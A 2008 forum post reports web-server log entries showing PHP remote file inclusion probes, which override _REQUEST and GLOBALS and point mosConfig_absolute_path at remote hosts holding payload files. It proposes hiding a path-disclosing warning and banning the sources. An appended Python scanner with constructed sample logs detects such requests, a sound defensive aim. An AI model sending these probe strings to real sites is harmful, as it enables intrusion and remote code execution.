Topic: security issue
Hi,
while going through my logs, I found query_strings like
//index1.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&osConfig_aabsolute_path=http://www.nm.tm//mysqlbackups/tmp/ididon.txt???
or
/?page=shop//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://apachi.100megsfree8.com/id.gif?
When a string containing REQUEST is submitted,
function import_request_variables ("CGP","");
in index.php shows a warning containing the absolute path.
This should be changed to
@import_request_variables ("CGP","");
and agents or IPs using these strings should be banned from the site.
Last edited by uli (2008-10-04 13:15:37)
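
Added example, not part of the original post or of the project's code: a log scanner that flags requests like the two quoted above (parameters named after PHP superglobals, or a *_path parameter set to a remote URL) and groups them by client IP so they can be reviewed or banned. It assumes Apache combined log format; the sample lines, IP addresses and the example.invalid host are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Assumption: Apache combined log format (client IP first, then the quoted request line).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+)')
# Parameter names that try to overwrite PHP superglobals, bare or with an array index.
SUPERGLOBAL_RE = re.compile(
    r'^(_REQUEST|_GET|_POST|_COOKIE|_SERVER|_FILES|_SESSION|_ENV|GLOBALS)(\[|$)')
# A path-style parameter whose value is a remote URL (heuristic for include probes).
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.I)

def classify(target):
    """Return the sorted reasons a request target looks like one of these probes."""
    reasons = set()
    # The probes chain several '?', so everything after the first one is the query
    # and pairs are split on both '&' and '?'.
    _, _, query = target.partition('?')
    for pair in re.split(r'[&?]', query):
        name, _, value = pair.partition('=')
        name, value = unquote(name), unquote(value)  # decode %5b / %5d etc.
        if SUPERGLOBAL_RE.match(name):
            reasons.add('superglobal-override')
        if name.lower().endswith('_path') and REMOTE_RE.match(value):
            reasons.add('remote-include-path')
    return sorted(reasons)

def scan(lines):
    """Map client IP -> set of probe reasons seen in that client's requests."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            reasons = classify(m.group('target'))
            if reasons:
                hits.setdefault(m.group('ip'), set()).update(reasons)
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2008:12:00:01 +0200] "GET /?page=shop//?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://example.invalid/id.gif? HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [04/Oct/2008:12:00:05 +0200] "GET /index.php?page=shop&id=3 HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.44 - - [04/Oct/2008:12:00:09 +0200] "GET //index1.php?_REQUEST=&_REQUEST%5boption%5d=com_content&GLOBALS= HTTP/1.0" 200 300 "-" "-"',
]

if __name__ == '__main__':
    for ip, reasons in sorted(scan(SAMPLE_LOG).items()):
        print(ip, ', '.join(sorted(reasons)))
```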
